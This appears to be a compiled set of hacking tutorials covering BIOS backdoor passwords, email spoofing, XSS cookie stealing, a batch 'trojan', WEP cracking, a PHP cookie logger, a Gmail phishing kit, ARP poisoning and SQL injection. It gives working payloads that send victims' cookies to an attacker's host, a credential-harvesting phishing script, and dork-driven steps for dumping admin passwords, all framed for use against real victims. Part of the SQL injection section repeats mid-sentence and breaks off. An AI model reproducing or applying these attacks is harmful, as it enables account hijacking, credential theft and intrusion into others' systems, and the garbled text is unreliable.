How to Bypass or Remove a BIOS Password

           A BIOS password is a protection measure that can be used to stop someone powering up a computer system or making changes in some of the computers most sensitive areas. Many big name computer manufacturers such as Dell and HP lock the customers out of this area because they don’t want the customer changing anything and potentially damaging the machine (which the manufacturer may have to warranty). However, when someone like a computer technician or hardware enthusiast needs to make some hardware changes to the computer, they will need to access the BIOS. Here are some methods to bypass or remove a BIOS password.

 NOTE: Do not try to guess the password on a passworded Hard Drive. 3 wrong guesses will often result in the information on the hard drive being lost forever.

How to Bypass or Remove a BIOS Password by Removing the CMOS Battery:

 The simplest way to remove a BIOS password is to simply remove the CMOS battery. A computer will remember its settings and keep the time even when it is turned off and unplugged because these parts are powered by small battery inside the computer called a CMOS battery. If we pull out this battery, the computer will forget alot of its hardware settings, including its BIOS password. This should not be performed on Laptops if you are not experienced working with laptop hardware.

Anyway, open up the computer case using a screw driver and locate the flat, circular and metallic CMOS battery. It should look something like the picture to the right. Some computers have this part standing upright.

Once you have located it, observe how the latches are holding it. There are many different ways to remove a CMOS battery but the most common way on newer computers can be seen in the picture below.

Make sure to power down the computer, unplug the power cables and unplug any USB devices if they are powered. The computer must not be able to get power from anywhere for this to work. Take out the CMOS battery and wait 10 – 25 minutes before putting it back in. The reason for this wait is because the computer can still store power in its capacitors even though everything is unplugged. The waiting period allows enough time for them to discharge.

Plug everything back in, power up the computer and enter the BIOS again. If everything went well there should be no more password. In some cases, if you get weird error messages during bootup now, you will need to goto “Load BIOS Defaults” in BIOS and save the changes to fix them.

If this method didn’t work, try one of the methods below.

How to Bypass or Remove a BIOS Password using Software:

!BIOS is a freeware utility which is designed to be a whole BIOS and security suite. It has the ability to decrypt the passwords used in some of the most common BIOS makes such as Award, Phoenix, American Megatrends, IMB etc..

 It also has the ability to brute force the password (known as “blasters”). However, this method is dangerous and can result in some unexpected and unwanted results.

Note: Because of this applications password cracking abilities, some antivirus software may report it as a virus/trojan. This is a false positive.

To start using !BIOS, reboot your computer and take note of the BIOS type and version you are running. For example, If your motherboard uses Award BIOS you should look for the text “Award Medallion BIOS 6.0″ or something similar.

Download !BIOS from here and save it to your desktop. Then, open a DOS command windows by going to Start > Run and type: cmd

Once you see a black screen in front of you, type: cd desktop

 You should now see something like: C:\Documents and Settings\yourusername\Desktop>

Now type the name of the file you just downloaded, if you haven’t changed the name just type in: bios320.exe

 Use the down arrow and choose “Crackers” and then press the right arrow. Using the up and down arrows, select the BIOS that the motherboard is using and press Enter.

You should now see a menu asking what you want to crack, in most cases its the Supervisor or System Passwords you want to crack, so press the 1 key on your keyboard. It will then show you another menu asking how you want it to be cracked. Option 1 is pretty good so try that first by pressing the 1 key on your keyboard. You should now have your BIOS password.

Reboot the computer, enter the BIOS and try it out.

How to Bypass or Remove a BIOS Password using the manufacturer backdoor password:

On many computers (especially old ones), computer manufacturers build in backdoor passwords for their own technicians to use so they can access the BIOS when the hardware is being serviced. Here are some of the ones that have been reported. You may need to try quite a few passwords before you find one that works

These passwords are case sensitive.

AMI BIOS Backdoor Passwords:

A.M.I.

AAAMMMII

AMI

AMI?SW

AMI_SW

BIOS

CONDO

HEWITT RAND

LKWPETER

MI

Oder

PASSWORD

Award BIOS Backdoor Passwords:

(eight spaces)

01322222

589589

589721

595595

598598

ALFAROME

ALLY

Ally

Ally

Ally

Apaf

Award

AWARD PW

AWARD SW

AWARD?SW

AWARD_PW

AWARD_SW

AWKWARD

Awkward

IOSTAR

CONCAT

CONDO

Condo

Condo

D8on

Djonet

HLT

J256

J262

J262

J322

J332

J64

KDD

LKWPETER

Lkwpeter

PINT

Pint

SER

SKY_FOXSYXZ

SKY_FOX

Syxz

SYXZ

TTPTHA

ZAAAADA

ZAAADA

ZBAAACA

ZJAAADC

Russian Award BIOS Passwords:

%øåñòü ïpîáåëîâ%

%äåâÿòü ïpîáåëîâ%

Phoenix Backdoor BIOS Passwords:

BIOS

CMOS

Phoenix

PHOENIX

Other Manufcaturers Backdoor Passwords: (manufacturer name – password)

VOBIS and IBM – merlin

Dell – Dell

Biostar – Biostar

Compaq – Compaq

Enox – xo11ne

Epox – central

Freetech – Posterie

Iwill – iwill

Jetway – spooml

Packard Bell – bell9

QDI – QDI

Siemens – SKY_FOX

SOYO – SY_MB

TMC – BIGO

Toshiba – Toshiba

ANONYMOUS EMAIL SENDING

Most of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details.

From: Bill Gates <billg@microsoft.com>
The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send Fake Email I insisted on using your own SMTP server to send anonymous emails. This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has a better success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So What’s Next?

Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However, all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. Here is a step-by-step procedure to setup your own Anonymous Email Sender Script:

Go to X10 Hosting  and register a new account.

Download my Anonymous Email Sender Script (sendmail.rar).

Login to your FreeWebHostingArea Account and click on File Manager.

Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

Now type the following URL:

http://yoursite.x10hosting.com/sendmail.php
NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.
Use the script to send Anonymous Emails. Enjoy!!!

CROSS SITE SCRIPTING (XSS):COOKIE GRABBING

XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking

First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.

Cookie Catcher: http://adf.ly/Tdbm


What does the cookie catcher do?
It grabs the user's:
Cookies
IP
Referral link which what page it got to that link
Time and Date

Get Vulnerable sites:

Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
http://adf.ly/Tdo3

Now for testing if a site is vuln or not you can add these codes:


Code:
"><script>alert(document.cookie)</script>
Code:
'><script>alert(document.cookie)</script>
Code:
"><script>alert("Test")</script>
Code:
'><script>alert("Test")</script>
Or a new one which i found out myself which you can inject HTML:
Code:
"><body bgcolor="FF0000"></body>
Code:
"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>



Then if we see a java script popup like this:
Spoiler Click to View
Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.

In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>




Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: http://adf.ly/Tdo3
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:



Code:
<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!



PS: the site i used doesn't support cookies so you can use: http://adf.ly/TeZV for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:


Code:
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>


Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.



Non-Persistent XSS:

Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:
Code:
<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: http://adf.ly/TeZV
Now in front of the search.php?search= add this:
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one:
http://hackcommunity.com/Thread-Anonymou...to-any-any

Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him


Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:
Code:
Javascript:void(document.cookie="")
or for an example:
Code:
Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

SIMPLE TROJAN MAKING

It Is a Simple Two Line Code to Make a Trojan

Go To C Drive and Create a Folder Called Programs

Open a notepad file in that Folder and Type "@echo off" In First Line (Without Quotations)

Type In

2nd line: copy c:\programs\virus.bat c:\programs

3rd line: start c:\programs\virus.bat

And Save the Text file as "virus.bat"

If U Click It the Code Will Execute and Eats Away the Hard Disk Memory of C drive As U Created in the Drive

Make Sure That u Won't Click That One IF u Done Just Delete the Folder

That’s all..........................

WIRELESS HACKING-(WEP CRACK)

          Wireless Hacking with backtrack 3 or Any of it Version is easy to do , in this article I’d like to guide you in Wireless hacking with backtrack 3. This tutorial is made based on some requests by my subscribers , they’ve been familiar enough with Backtrack 3 , that’s why I made this Wireless Hacking with backtrack 3 tutorial. In order to start the wireless hacking , you need to make sure that you have met these requirements :


- Backtrack 3 or newer release

- 1 wireless router

- Laptop with wireless card(ALPHA/DLINK Wireless Adapters)

And let the hack begins :

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, aor connecting to the AP.

***********************************************************************
Here are some things you need to know before you get confused
When you see this (device) or (bssid) you DON’T put the ( )!!!
(device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1
(bssid) = This is the consenting computers bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55
************************************************************************

Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Double click the home icon, rigt click the blank white area and select create new Txt File name it Exidous or what ever you want! click ok, now close the window.

Ok let’s start!
Commands | Meaning
====================

*open up 3 shell konsoles by clicking the little black box next to the start button.

* The first thing were going to do is stop the device aka ethernet card
airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress (to see available wireless cards type, iwconfig
ifconfig (device) down

* Ok now just to make things simpler, so we don’t have to hunt down what our Mac address is
macchanger –mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP’s
airmon-ng start (device)

* Lets start seeing what AP’s are there
airodump-ng (device)

* After you see all the AP’s execute the following command to stop it and copy the bssid
CTRL+C Copy bssid of consenting computer

* Now on to the consenting computer’s AP (were listening in for authentication packets
airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process
aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually inject!
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV’s for 64 bit encryption / AFTER GETTING AT LEAST 10,000 Data/IV’s for 128 bit encryption
aircrack-ng -n 64 –bssid (bssid) Exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password with out the :
EG: Wep Key = 33:C7:C6:09:30
When Entered into username and password it will look like this. 33C7C60930

Get backtrack linux at - http://www.backtrack-linux.org/

SESSION HIJACKING

            In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).

Here we show how you can hack a session using javascript and php.

What is a cookie?

A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.

What can we do after stealing cookie?

Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.

This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.

PHP Code:
<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>

Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)

Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.

Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.

The best way is to look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>

Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>

All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver

In the above codes please remove the space in between javascript.

Hijacking the Session:

Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.

Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573

GMAIL HACKING

I Am Going Teach How To Hack To Hack GMAIL Account Through A Technique Called Pishing Technique.

At First We Need 3 Files
1. Index.html
2. Mail.php
3. Log.txt

(1)

To Get Index.html File

----->First Go To "www.gmail.com" and right click on it
----->Select "View Source Code"
----->Copy All Code And Paste In Notepad
----->Search A Word In Code For "Action"
----->Beside The Word Action A Link Is Present In Qoutations, Delete All Link In Qoutations
----->Instead Type mail.php In The Qoutations
----->Save It As index.html

(2)

To Get Mail.php File

---->Copy The Following Programm And Paste It in Notepad
---->Save It as mail.php

<?php
header ('Location: http://www.gmail.com/');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

(3)

Finally The 3rd File
----->It is a Empty Notepad File
----->Save It As log.txt

That's All We Got All 3 Files

Upload These 3 Files Into Your Website

No Need To Worry About Website There Are Many Free WebHosting Sites To Create Free Website

Eg: www.000webhost.com

----->Create Your Website And Open Your Cpanel
----->Open File Manager
----->Upload These 3 Files In Public_html Floder
----->That's All

Then Finally To Attack We Need a Pishing Link

Then Your Pishing Link Will Be

www.example.com/index.html

Send The Pishing Link To Ur Victim As Gmail Has Send Mail

If He Uses the Link The Password And Id Will Be Saved To Log.txt
File In Ur Website

To View It
----->Open Cpanel Of Ur Website And Open Ur Filemanger
----->Open Public_html Folder
----->click Log.txt file
----->Search For Word Pass
----->There U Go U Will Find Password Beside It The Id Will Be There

This Technique Can Be Used For Any Website Hacking

ARP POISONING

MAN IN THE MIDDLE ATTACK PROCESS:

For Doing This You Need BackTrack Operating System Installed In Your Virtual Box...

Open Back Track Operating System In Virtual Box..

The Default UserName is  "root"  And Password Is  "toor"

------------------------------------------------------------------------------------------------------------

STEP 1:
 OPen The Root Teriminal(Comand Prompt) in Bt(Back Track)

   Type "ettercap -G" And Hit Enter
   It Opens Ettercap Software
   Open Internet Connections From TaskBar Menu
   Open Konquer Browser
   Open Path In Folder     "root/etc"
   Search The File "etter.conf" And Open It

   Search For Word  "Privs" And Below That   (MAKE THEM BOTH EQUAL TO ZERO)
      ec_uid=0
      ec_gid=0
   
   Search For Word  "Linux"
   In The Sentence  "# If You Use Iptables"  Remove  #

   save It....

-----------------------------------------------------------------------------------------------------------

STEP 2:

   Now Open "sysctl.conf"  File
   Search For The Line "# The Next Line To Enable Packet Forwarding For IPV4"
   Remove # From The Line

   Below It Another Line Is Present "# net.ipv4.ip_forward=1"
   Remove # From The Line

------------------------------------------------------------------------------------------------------------

STEP 3:

     Go To Ettercap
     Open    Sniff------->Unified Sniffing
     Select The Interface And Click Ok

     Click    (1)  Start-------->start Sniffing
                 (2)  Hosts------->scan For Hosts

     To See The List Of Hosts
      Click   Hosts--------->Hosts  List

     Select The Ip Address Of Victim 1In the List And  Click "Add Target 1"
     Select The Ip Address Of Victim 2 In The List and Click "Add Target 2"

     Goto  "MITM" Option In The Menu Bar Of Ettercap
     Click "Arp Poisoning"
     Select "Sniff Remote Connections" And Press Ok
   
     ARP Replys Will be sent To The Victims

     To See That  Open Teriminal(Command Prompt)  And Type  "Wireshark"
      And Hit Enter
   
     You Can See The Arp Packets Are Sending To Victims..........


------------------------------------------------------------------------------------------------------------

    To Check Whether It Is Working Or Not
   
    Goto   Plugins---------->Manage Plugins
    Click "chk_poison" To Check Poison
     It Will Show The Poison Is Working Are Not

------------------------------------------------------------------------------------------------------------

If U want Any Changes In The Victims Browser

Goto Path  "Root/usr/share/ettercap/etter.filter.examples"

And Open That File And Copy One Example Of It

And Paste It In Any Empty Document And Save It As "Filename.filter"

Compile The File "Filename.filter" In The Teriminal With Command  "Filename.filter -O NewFileName"

Then It Produce a New File

Open Ettercap And Open The Option "Filters"

Open "Load Filter" And Select and Browse The Compiled File Of Filter and Hit Ok

Now If The Victim Opens Any Website In His Browser The Images In The Website Will Be Appeared As any Image Prescribed In The Filter (The Link Of The Image In The Filter).



                            ---------THE END---------

SQL INJECTION

SQL INJECTION

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

-----------------------------------------------------------------------------

STEP 1: (Finding Vulnerable Website)

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

HOW TO USE ?

copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

NOTE:

if you like to hack particular website,then try this:
site:www.example.com dork_list_commands
for eg:

site:www.example.com inurl:index.php?id=

-----------------------------------------------------------------------------

STEP 2:(Checking the Vulnerability)

Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.example.com/index.php?id=2'

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!

For eg:

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)

-----------------------------------------------------------------------------

STEP 3:(Finding Number of columns)

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.example.com/index.php?id=2 order by 1
http://www.example.com/index.php?id=2 order by 2
http://www.example.com/index.php?id=2 order by 3
http://www.example.com/index.php?id=2 order by 4

change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.example.com/index.php?id=2 order by 1(noerror)
http://www.example.com/index.php?id=2 order by 2(noerror)
http://www.example.com/index.php?id=2 order by 3(noerror)
http://www.example.com/index.php?id=2 order by 4(noerror)
http://www.example.com/index.php?id=2 order by 5(noerror)
http://www.example.com/index.php?id=2 order by 6(noerror)
http://www.example.com/index.php?id=2 order by 7(noerror)
http://www.example.com/index.php?id=2 order by 8(error)

so now x=8 , The number of column is x-1 i.e, 7.

Sometime the above may not work. At the time add the "--" at the end of the statement.

For eg:

http://www.example.com/index.php?id=2 order by 1--

-----------------------------------------------------------------------------

STEP 4: (Displaying the Vulnerable columns)

Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing).

Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:

http://www.example.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).

Now select 1 number.
It showing 3,7. Let's take the Number 3.

-----------------------------------------------------------------------------

Step 5: Finding version,database,user
Now replace the 3 from the query with "version()"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

-----------------------------------------------------------------------------

STEP 6: (Finding the Table Name)

If the version is 5 or above. Then follow these steps. Now we have to find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related with the admin or user.

Now select the "admin " table.

If the version is 4 or some others, you have to guess the table names. (user, tbluser). It is hard and bore to do sql inection with version 4.

-----------------------------------------------------------------------------

STEP 7: (Finding the Column Name)

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

Now listen carefully ,we have to find convert the table name to MySql CHAR() string and replace mysqlchar with that .

Find MysqlChar() for Tablename:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open the small window ,enter the table name which you found. i am going to use the admin table name.

click ok

Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.

Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns,like

admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

Columnname should be replaced from the listed column name.
anothercolumnname should be replace from the listed column name.

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometime it will show the column is not found.
Then try another column names

Now it will Username and passwords.

Enjoy..!!cheers..!!

If the website has members then jock-bot for you. You will have the list of usernames and password.
Some time you may have the email ids also,enjoy you got the Dock which can produce the golden eggs.

-----------------------------------------------------------------------------

STEP 8: (Finding the AdmiSQL INJECTION

What is SQL Injection?
SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
Follow my steps.

-----------------------------------------------------------------------------

STEP 1: (Finding Vulnerable Website)

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.ziddu.com/download/13161874/A...t.zip.html

HOW TO USE ?

copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
So Start from the first website.

NOTE:

if you like to hack particular website,then try this:
site:www.example.com dork_list_commands
for eg:

site:www.example.com inurl:index.php?id=

-----------------------------------------------------------------------------

STEP 2:(Checking the Vulnerability)

Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes)

For eg:
http://www.example.com/index.php?id=2'

If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.

If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!!

For eg:

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)

-----------------------------------------------------------------------------

STEP 3:(Finding Number of columns)

Now we have found the website is vulnerable. Next step is to find the number of columns in the table.
For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement)

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:

http://www.example.com/index.php?id=2 order by 1
http://www.example.com/index.php?id=2 order by 2
http://www.example.com/index.php?id=2 order by 3
http://www.example.com/index.php?id=2 order by 4

change the number until you get the error as "unknown column"

if you get the error while trying the "x"th number,then no of column is "x-1".

I mean:

http://www.example.com/index.php?id=2 order by 1(noerror)
http://www.example.com/index.php?id=2 order by 2(noerror)
http://www.example.com/index.php?id=2 order by 3(noerror)
http://www.example.com/index.php?id=2 order by 4(noerror)
http://www.example.com/index.php?id=2 order by 5(noerror)
http://www.example.com/index.php?id=2 order by 6(noerror)
http://www.example.com/index.php?id=2 order by 7(noerror)
